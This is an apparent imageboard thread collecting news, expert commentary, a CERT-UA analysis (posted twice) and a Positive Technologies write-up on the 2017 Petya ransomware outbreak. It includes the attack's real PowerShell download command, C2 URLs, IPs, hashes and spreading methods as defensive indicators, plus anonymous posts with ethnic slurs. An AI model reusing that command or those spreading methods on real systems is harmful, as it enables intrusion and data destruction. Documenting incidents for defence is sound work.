"Чего хотят добиться хакеры – это скорее вопрос к психологам. Я не знаю. Но сейчас они уже добились того, что в экономике страны случился коллапс. Все застыло. Эта атака, я считаю, была сделала из экономических побуждений, нанести ущерб целой стране, а не отдельным компаниям. Скорее всего, эта атака приведет к большим экономическим убыткам. Это элемент терроризма. Кибер-тероризм", – комментирует Александр Федиенко.
9. Как защититься от вируса?
1) Обязательно пользоваться антивирусами. По мнению специалиста, Virus "Petya А" блокирует сервис Avast, тога как "Касперский" этот вирус не видит. Принудительно обновите базу антивируса и операционные системы.
2) Не скачивать сторонние программы и файлы.
3) Не переходите по сторонним подозрительным ссылкам, в том числе, из соцсетей. Особенно если они исходят от неизвестных вам пользователей. Хотя, по словам Федиенко, не стоит открывать вообще никакие файлы и программы, даже если вам их присылают ваши знакомые. Или пропускать их через антивирусы.
4) Если заражение все-таки произошло, после заражения не перезагружайте компьютер! Этим вы активируете вирус.
"К сожалению, других, более подробных и конкретных рекомендаций пока дать нельзя, потому что до сих пор не ясно до конца, что это за вирус", – говорит Александр Федиенко.
10. Кто стоит за хакерской атакой?
Пока неизвестно. Но то, что атака нацелена на экономику всей страны, говорит о факте вмешательства извне.
Советник министра МВД Антон Геращенко уже заявил, что кибератака под видом вируса-вымогателя была организована со стороны спецслужб РФ.
По словам Федиенко, недавно аналогичный вирус распространялся в Европе.
"Пока нет точных фактов, что это за вирус и откуда он пришел. Но я читал в иностранной прессе, что в Европе недавно была похожая атака. Но она развивалась очень медленно и вяло. Просто в связи с тем, что украинский сегмент интернета очень высокоскоростной, плюс хорошее проникновение абонентов, в Украине этот вирус распространяется молниеносно. Грубо говоря, за полчаса заражено пол-страны", – говорит Федиенко.
Специалист отмечает, что наша страна де-факто оказалась неготовой к такой кибератаке. "Это звездный час подразделения по кибербезопасности. Наши компетентные службы сейчас должны тщательно и быстро все проанализировать и дать четкие рекомендации нашей отрасли, как реагировать и как бороться с вирусом", – отмечает Александр Федиенко.
https://antikor.com.ua/articles/176664-10_voprosov_o_samoj_masshtabnoj_kiberatake_v_istorii_ukrainy сайт может быть заблочен
> (win7 без обнов)
> без обнов
> обновы это зондв ФБРКГБ мне прямо в анус
Ну и сиди, как дурак с зашифрованными файлами.
благодарочки
обновы шindoшs хуже заразы часто. ибо смывают активаторы и тд.
с файлами всё ок. читай не через строчку. это заражение(в конце апреля) привело к тому что я всё залатал и wannacry не прошёл.
Petya и Misha похоже на отсылку к taran & pidoran
> смывают активаторы и тд.
Пиздец проблема, лол. Активировался заново и всё. Пять секунд делов. Но нет, русня стерпит любые неудобства. Вороватая пидорашка.
Ты ебобо?
>Не дайте ему зашифровать и всё, чекаешь процессы
Всегда думал, что правильно настроенное Software Restriction Policies решит эту проблему.
Админы/кулкакиры в треде, так ли это?
ноунейм
https://habrahabr.ru/company/infosecurity/blog/331788/.a--petya.c--petrwrap-ili-petyacry#comment_10286542
известный васяночник(в каждой второй сборке винды есть его наработки)
https://habrahabr.ru/post/331762/#comment_10285898
Криптовымогатель Petya денег не получит: генерируем ключ разлочки жесткого диска сами Аноним 28/06/17 Срд 01:47:34 #215 №1061264
служба e-mail, услугами которой пользовались злоумышленники, заблокировала почтовые адреса, на которые должны приходить данные об уплате выкупа. Так что даже если вы переведете деньги, вам не удастся связаться с ними, подтвердить перевод и получить ключ, необходимый для восстановления файлов.
Найден способ локально остановить исполнение программы вируса-вымогателя Petya, поразившего многие компьютеры в России и на Украине. Для этого в папке с Windows надо создать файл без расширения с именем "perfc" - его отсутствие вирус проверяет перед началом разрушительных действий. Впрочем, эксперты "Лаборатории Касперского" утверждают, что сети атаковал и другой вирус.
Если успеть до перезагрузки компьютера запустить команду bootrec/fixMbr, можно восстановить работоспособность операционной системы и запустить ее, отметили специалисты в Positive Technologies
(по другим данным - perfc.dat)
>Хотел разлочить Петю, скачал генератор ключа от добрых людей
>Парни, как разлочить Васю?
Специалисты CERT-UA проанализировали способ распространения вируса Petya Ransomware и разработали рекомендации по защите от него Аноним 28/06/17 Срд 17:10:11 #221 №1063892
Вчера, 27 июня, многие украинские компании подверглись массированной кибератаке, в результате чего компьютеры были заражены вирусом-шифровальщиком Petya Ransomware.
Специалисты команды реагирования на компьютерные чрезвычайные события Украины CERT-UA проанализировали эту атаку и выработали рекомендации по защите компьютеров от проникновения вируса. Так, был проанализирован файл:
[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/
Данный файл, эксплуатирует уязвимость CVE-2017-0199.
После эксплуатации уязвимости на инфицированный компьютер загружался xls-файл (hxxp://84.200.16.242/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/
Данный xls-файл выступал в качестве загрузчика и содержал в себе обфусцированный javascript код.
После деобфускации кода удалось выяснить, что с помощью команды Powershell на инфицированный компьютер был загружен исполняемый файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)
Данный исполняемый файл использовался в качестве загрузчика дальнейшего функционала шифровальщика файлов Petya Ransomware.
Командно-контрольный центр:
hххp://coffeinoffice.xyz:80/cup/wish.php
Механизм распространения был заимствован у шифровальщика файлов WannaCry, который использовал уязвимость MS17-010 для распространения как по локальной, так и по глобальной сети.
После шифрования компьютера происходила перезагрузка системы, в результате которой жертва получала сообщения с требованием выкупа.
Данный тип шифровальщика повреждал таблицу MBR, в результате чего загрузка операционной системы не продолжалось.
По предварительным данным, указанный исполняемый файл загружал в директорию C:\Windows файл с названием perfc.dat, выступавший в качестве основного функционального элемента данного шифровальщика. Удалось выяснить, что шифровальщик файлов устанавливал в планировщике задач команду на перезапуск системы. После перезагрузки системы на инфицированный компьютер приходил фейковый chkdsk.
Следовательно, можно утверждать, что новый подвид Petya.A, который атаковал Украину 27 июня — это комбинация уязвимостей CVE-2017-0199 и MS17-010 (ETERNALBLUE, использованная в Wcry в результате утечки через ShadowBrokers).
Перечень индикаторов компрометации:
84.200.16.242:80
french-cooking.com:443
coffeinoffice.xyz:80
File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
Рекомендации CERT-UA по обеспечению защиты от заражения вирусом-шифровальщиком:
Обеспечить недопустимость открытия вложений в подозрительных сообщениях (в письмах от адресантов, относительно которых возникают подозрения, например: автор по неизвестным причинам изменил язык общения; тема письма является нетипичной для автора; нетипичное обращение к адресату и т.д.; сообщения с нестандартным текстом, побуждающие к переходу на подозрительные ссылки или к открытию подозрительных файлов — архивов, исполняемых файлов и т.д.).
Системным администраторам и администраторам безопасности обратить внимание на фильтрование входящих/исходящих информационных потоков, в частности почтового и веб-трафика.
Установить официальный патч MS17-010.
На сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP.
В случае инфицирования персонального компьютера не перезагружать систему.
Ограничить возможность запуска исполняемых файлов (.exe) на компьютерах пользователей из директорий %TEMP%, %APPDATA%.
Обратиться к рекомендациям CERT-UA по поводу безопасности почтовых сервисов.
Для возможности восстановления зашифрованных файлов воспользоваться программами ShadowExplorer или PhotoRec.
Источник: CERT-UA
Специалисты команды реагирования на компьютерные чрезвычайные события Украины CERT-UA проанализировали эту атаку и выработали рекомендации по защите компьютеров от проникновения вируса. Так, был проанализирован файл:
[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/
Данный файл, эксплуатирует уязвимость CVE-2017-0199.
После эксплуатации уязвимости на инфицированный компьютер загружался xls-файл (hxxp://84.200.16.242/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/
Данный xls-файл выступал в качестве загрузчика и содержал в себе обфусцированный javascript код.
После деобфускации кода удалось выяснить, что с помощью команды Powershell на инфицированный компьютер был загружен исполняемый файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)
Данный исполняемый файл использовался в качестве загрузчика дальнейшего функционала шифровальщика файлов Petya Ransomware.
Командно-контрольный центр:
hххp://coffeinoffice.xyz:80/cup/wish.php
Механизм распространения был заимствован у шифровальщика файлов WannaCry, который использовал уязвимость MS17-010 для распространения как по локальной, так и по глобальной сети.
После шифрования компьютера происходила перезагрузка системы, в результате которой жертва получала сообщения с требованием выкупа.
Данный тип шифровальщика повреждал таблицу MBR, в результате чего загрузка операционной системы не продолжалось.
По предварительным данным, указанный исполняемый файл загружал в директорию C:\Windows файл с названием perfc.dat, выступавший в качестве основного функционального элемента данного шифровальщика. Удалось выяснить, что шифровальщик файлов устанавливал в планировщике задач команду на перезапуск системы. После перезагрузки системы на инфицированный компьютер приходил фейковый chkdsk.
Следовательно, можно утверждать, что новый подвид Petya.A, который атаковал Украину 27 июня — это комбинация уязвимостей CVE-2017-0199 и MS17-010 (ETERNALBLUE, использованная в Wcry в результате утечки через ShadowBrokers).
Перечень индикаторов компрометации:
84.200.16.242:80
french-cooking.com:443
coffeinoffice.xyz:80
File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
Рекомендации CERT-UA по обеспечению защиты от заражения вирусом-шифровальщиком:
Обеспечить недопустимость открытия вложений в подозрительных сообщениях (в письмах от адресантов, относительно которых возникают подозрения, например: автор по неизвестным причинам изменил язык общения; тема письма является нетипичной для автора; нетипичное обращение к адресату и т.д.; сообщения с нестандартным текстом, побуждающие к переходу на подозрительные ссылки или к открытию подозрительных файлов — архивов, исполняемых файлов и т.д.).
Системным администраторам и администраторам безопасности обратить внимание на фильтрование входящих/исходящих информационных потоков, в частности почтового и веб-трафика.
Установить официальный патч MS17-010.
На сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP.
В случае инфицирования персонального компьютера не перезагружать систему.
Ограничить возможность запуска исполняемых файлов (.exe) на компьютерах пользователей из директорий %TEMP%, %APPDATA%.
Обратиться к рекомендациям CERT-UA по поводу безопасности почтовых сервисов.
Для возможности восстановления зашифрованных файлов воспользоваться программами ShadowExplorer или PhotoRec.
Источник: CERT-UA
Требования - офис 2007sp3 и новее.Windows 7 sp1 и новее
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199
13 апреля в 22:46
Началась массовая рассылка документов, использующих 0day-уязвимость в Word
https://geektimes.ru/post/288088/
Началась массовая рассылка документов, использующих 0day-уязвимость в Word
https://geektimes.ru/post/288088/
Анализ образца вымогателя, проведенный нашими экспертами, показал, что принцип действия Petya основан на шифровании главной загрузочной записи (MBR) загрузочного сектора диска и замене его своим собственным. Эта запись – первый сектор на жёстком диске, в нем расположена таблица разделов и программа-загрузчик, считывающая из этой таблицы информацию о том, с какого раздела жёсткого диска будет происходить загрузка системы. Исходный MBR сохраняется в 0x22-ом секторе диска и зашифрован с помощью побайтовой операции XOR с 0x07.
После запуска вредоносного файла создается задача на перезапуск компьютера, отложенная на 1-2 часа, в это время можно успеть запустить команду bootrec /fixMbr для восстановления MBR и восстановить работоспособность ОС. Таким образом, запустить систему даже после ее компрометации возможно, однако расшифровать файлы не удастся. Для каждого диска генерируется свой ключ AES, который существует в памяти до завершения шифрования. Он шифруется на открытом ключе RSA и удаляется. Восстановление содержимого после завершения требует знания закрытого ключа, таким образом, без знания ключа данные восстановить невозможно. Предположительно, зловред шифрует файлы максимум на глубину 15 директорий. То есть файлы, вложенные на большую глубину, находятся в безопасности (по крайней мере для данной модификации шифровальщика).
В случае, если диски оказались успешно зашифрованы после перезагрузки, на экран выводится окно с сообщением о требовании заплатить выкуп $300 (на 27 июня 2017 — примерно 0,123 биткойна) для получения ключа разблокировки файлов. Для перевода денег указан биткоин-кошелек 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. Через несколько часов после начала атаки на кошелек уже поступают транзакции, кратные запрошенной сумме – некоторые жертвы предпочли заплатить выкуп, не дожидаясь, пока исследователи изучат зловред и попытаются найти средство восстановления файлов.
Petya использует 135, 139, 445 TCP-порты для распространения (с использованием служб SMB и WMI). Распространение внутри сети на другие узлы происходит несколькими методами: с помощью Windows Management Instrumentation (WMI) и PsExec, а также с помощью эксплойта, использующего уязвимость MS17-010 (EternalBlue). WMI – это технология для централизованного управления и слежения за работой различных частей компьютерной инфраструктуры под управлением платформы Windows. PsExec широко используется для администрирования Windows и позволяет выполнять процессы в удаленных системах. Однако для использования данных утилит необходимо обладать привилегиями локального администратора на компьютере жертвы, а значит, шифровальщик может продолжить свое распространение только с тех устройств, пользователь которых обладает максимальными привилегиями ОС. Эксплойт EternalBlue позволяет получить максимальные привилегии на уязвимой системе. Также шифровальщик использует общедоступную утилиту Mimikatz для получения в открытом виде учетных данных всех пользователей ОС Windows, в том числе локальных администраторов и доменных пользователей. Такой набор инструментария позволяет Petya сохранять работоспособность даже в тех инфраструктурах, где был учтен урок WannaCry и установлены соответствующие обновления безопасности, именно поэтому шифровальщик настолько эффективен.
В рамках тестирований на проникновение современных корпоративных инфраструктур эксперты Positive Technologies регулярно демонстрируют возможность применения эксплойта EternalBlue (в 44% работ в 2017 году), а также успешное применение утилиты Mimikatz для развития вектора атаки до получения полного контроля над доменом (в каждом проекте).
Таким образом, Petya обладает функциональностью, позволяющей ему распространяться на другие компьютеры, причем этот процесс лавинообразный. Это позволяет шифровальщику скомпрометировать в том числе контроллер домена и развить атаку до получения контроля над всеми узлами домена, что эквивалентно полной компрометации инфраструктуры.
О существующей угрозе компрометации мы сообщали более месяца назад в оповещениях об атаке WannaCry и давали рекомендации, каким образом определить уязвимые системы, как их защитить и что делать, если атака уже произошла. Дополнительные рекомендации мы дадим и в данной статье. Кроме того, наша компания разработала бесплатную утилиту WannaCry_Petya_FastDetect для автоматизированного выявления уязвимости в инфраструктуре. Система MaxPatrol выявляет данную уязвимость как в режиме Audit, так и в режиме Pentest. Подробная инструкция указана в наших рекомендациях. Кроме того, в MaxPatrol SIEM заведены соответствующие правила корреляции для выявления атаки Petya.
Эксперты Positive Technologies выявили “kill-switch” – возможность локально отключить шифровальщик. Если процесс имеет административные привилегии в ОС, то перед подменой MBR шифровальщик проверяет наличие файла perfc (либо другого пустого файла с иным названием) без расширения в директории C:\Windows\ (директория жестко задана в коде). Этот файл носит то же имя, что и библиотека dll данного шифровальщика (но без расширения).
Наличие такого файла в указанной директории может быть одним из индикаторов компрометации. Если файл присутствует в данной директории, то процесс выполнения ВПО завершается, таким образом, создание файла с правильным именем может предотвратить подмену MBR и дальнейшее шифрование.
Если шифровальщик при проверке не обнаружит такой файл, то файл создается и стартует процесс выполнения ВПО. Предположительно, это происходит для того, чтобы повторно не запустился процесс подмены MBR.
С другой стороны, если процесс изначально не обладает административными привилегиями, то шифровальщик не сможет выполнить проверку наличия пустого файла в директории C:\Windows\, и процесс шифрования файлов все же запустится, но без подмены MBR и перезапуска компьютера.
Для того, чтобы не стать жертвой подобной атаки, необходимо в первую очередь обновить используемое ПО до актуальных версий, в частности, установить все актуальные обновления MS Windows. Кроме того, необходимо минимизировать привилегии пользователей на рабочих станциях.
Если заражение уже произошло, мы не рекомендуем платить деньги злоумышленникам. Почтовый адрес нарушителей [email protected] был заблокирован, и даже в случае оплаты выкупа ключ для расшифрования файлов наверняка не будет получен. Для предотвращения распространения шифровальщика в сети рекомендуется выключить другие компьютеры, которые не были заражены, отключить от сети зараженные узлы и снять образы скомпрометированных систем. В случае, если исследователи найдут способ расшифрования файлов, заблокированные данные могут быть восстановлены в будущем. Кроме того, данный образ может быть использован для проведения анализа шифровальщика, что поможет исследователям в их работе.
В долгосрочной перспективе рекомендуется разработать систему регулярных тренингов сотрудников с целью повышения их осведомленности в вопросах информационной безопасности, основанную на демонстрации практических примеров потенциально возможных атак на инфраструктуру компании с использованием методов социальной инженерии. Необходимо проводить регулярную проверку эффективности таких тренингов. Также необходимо на все компьютеры установить антивирусное ПО с функцией самозащиты, предусматривающей ввод специального пароля для отключения или изменения настроек. Кроме того, необходимо обеспечить регулярное обновление ПО и ОС на всех узлах корпоративной инфраструктуры, а также эффективный процесс управления уязвимостями и обновлениями. Регулярное проведение аудитов ИБ и тестирований на проникновение позволит своевременно выявлять существующие недостатки защиты и уязвимости систем. Регулярный мониторинг периметра корпоративной сети позволит контролировать доступные из сети Интернет интерфейсы сетевых служб и вовремя вносить корректировки в конфигурацию межсетевых экранов. Для своевременного выявления и пресечения уже случившейся атаки необходимо осуществлять мониторинг внутренней сетевой инфраструктуры, для чего рекомендуется применять систему класса SIEM.
Для выявления атаки Petya в инфраструктуре могут быть использованы следующие индикаторы:
C:\Windows\perfс
Задача в планировщике Windows с пустым именем и действием (перезагрузка)
"%WINDIR%\system32\shutdown.exe /r /f"
Срабатывание правил IDS/IPS:
<не влезло>
https://habrahabr.ru/company/pt/blog/331858/
Вирус блокирует компьютеры и вымогает у пользователей деньги, он похож на вирус WannaCry, который в мае этого года атаковал компьютеры практически по всему миру.
https://twitter.com/RosneftRu/status/879665160012673024
https://twitter.com/RosneftRu/status/879665269135855617
Источник, близкий к одной из структур компании, отмечает, что все компьютеры в НПЗ "Башнефти", "Башнефть-добыче" и управлении "Башнефти" "единомоментно перезагрузились, после чего скачали неустановленное программное обеспечение и вывели на экран заставку вируса WannaCry". На экране пользователям было предложено перевести $300 в биткоинах по указанному адресу, после чего пользователям будет выслан ключ для разблокировки компьютеров на e-mail. Вирус, судя из описания, зашифровал все данные на пользовательских компьютерах.
"Ведомости"
"Национальный банк Украины предупредил банки и других участников финансового сектора о внешней хакерской атаке неизвестным вирусом на несколько украинских банков, а также на некоторые предприятия коммерческого и государственного секторов, что происходит сегодня.
В результате таких кибератак эти банки сложности с обслуживанием клиентов и осуществлением банковских операций".
Нацбанк Украины
Компьютерные системы столичной энергокомпании "Киевэнерго" подверглись хакерской атаке, сообщили агентству "Интерфакс-Украина" в компании.
"Мы подверглись хакерской атаке. Два часа назад вынуждены были выключить все компьютеры, ожидаем разрешения на включение от службы безопасности", – сказали в "Киевэнерго".
В свою очередь, в НЭК "Укрэнерго" агентству "Интерфакс-Украина" сообщили, что компания также столкнулась с проблемами в работе компьютерных систем, но они не являются критическими.
"Были некоторые проблемы с работой компьютеров. Но в целом все стабильно и контролировано. Выводы по инциденту можно будет сделать по итогам внутреннего расследования", – отметили в компании.
"Интерфакс-Украина"
Сети "Укрэнерго" и ДТЭК, крупнейших энергетических компаний Украины, оказались заражены новой формой вируса-шифровальщика, напоминающего WannaCry. Об этом TJ рассказал источник внутри одной из компаний, непосредственно столкнувшийся с атакой вируса.
По словам источника, днём 27 июня его компьютер на работе перезагрузился, после чего система якобы начала проверку жёсткого диска. После этого он увидел, что аналогичное происходит на всех компьютерах в офисе: "Я понял, что идёт атака, вырубил свой компьютер, а когда включил, была уже красная надпись про биткоин и деньги".
TJ
Компьютеры в сети компании логистических решений Damco также поражены. И в европейских, и в российских подразделениях. Охват заражения очень широкий. Известно, что в Тюмени, например, тоже всё похекано.
Но вернёмся к теме Украины: почти все компьютеры Запорожьеоблэнерго, Днепроэнерго и Днепровской электроэнергетической системы также заблокированы вирусной атакой.
Уточняем – это не WannaCry, но подобный по своему поведению зловред.
Роснефть Рязань НПЗ – отключили сеть. Тоже атака. Помимо Роснефти/Башнефти, атаки подверглись и другие крупные компании. Сообщается о проблемах в Mondelēz International, Ощадбанк, Mars, Новая Почта, Nivea, TESA и другие.
Вирус определен — это Petya.A. Petya.A жрёт жесткие диски. Он шифрует главную таблицу файлов (MFT) и вымогает деньги за расшифровку.
Киевский метрополитен также подвергся хакерской атаке. Атакованы правительственные компьютеры Украины, магазины Ашан, украинские операторы (Киевстар, LifeCell, УкрТелеКом), ПриватБанк. Поступают сообщения об аналогичной атаке на ХарьковГаз. По словам системного администратора, на машинах была установлена Windows 7 с последними обновлениями. Павел Валериевич Розенко, вице-премьер Украины, также подвергся атаке. Аэропорт Борисполь, предположительно, также подвергся хакерской атаке.
Телеграм-канал "Сайберсекьюрити и Ко.
27 июня, 16:27 От вируса Petya.A пострадали не менее 80 российских и украинских компаний, сообщил Валерий Баулин, представитель компании Group-IB, которая специализируется на раннем выявлении киберугроз.
"По нашим данным, в результате атаки с помощью вируса-шифровальщика Petya.A пострадали больше 80 компаний в России и на Украине", – сказал он. Баулин подчеркнул, что атака не связана с WannaCry.
Для прекращения распространения вируса нужно немедленно закрыть TCP-порты 1024–1035, 135 и 445, подчеркнули в Group-IB <...>
"Среди жертв кибератаки оказались сети "Башнефти", "Роснефти", украинских компаний "Запорожьеоблэнерго", "Днепроэнерго" и Днепровской электроэнергетической системы, также заблокированы вирусной атакой Mondelēz International, Ощадбанк, Mars, "Новая Почта", Nivea, TESA и другие. Киевский метрополитен также подвергся хакерской атаке. Атакованы правительственные компьютеры Украины, магазины Ашан, украинские операторы (Киевстар, LifeCell, УкрТелеКом), Приват Банк. Аэропорт "Борисполь", предположительно, также подвергся хакерской атаке", – указывает Group-IB.
Специалисты Group-IB также установили, что недавно шифровальщик Petya.А использовала группа Cobalt для сокрытия следов целевой атаки на финансовые учреждения.
RNS
http://varlamov.ru/2440873.html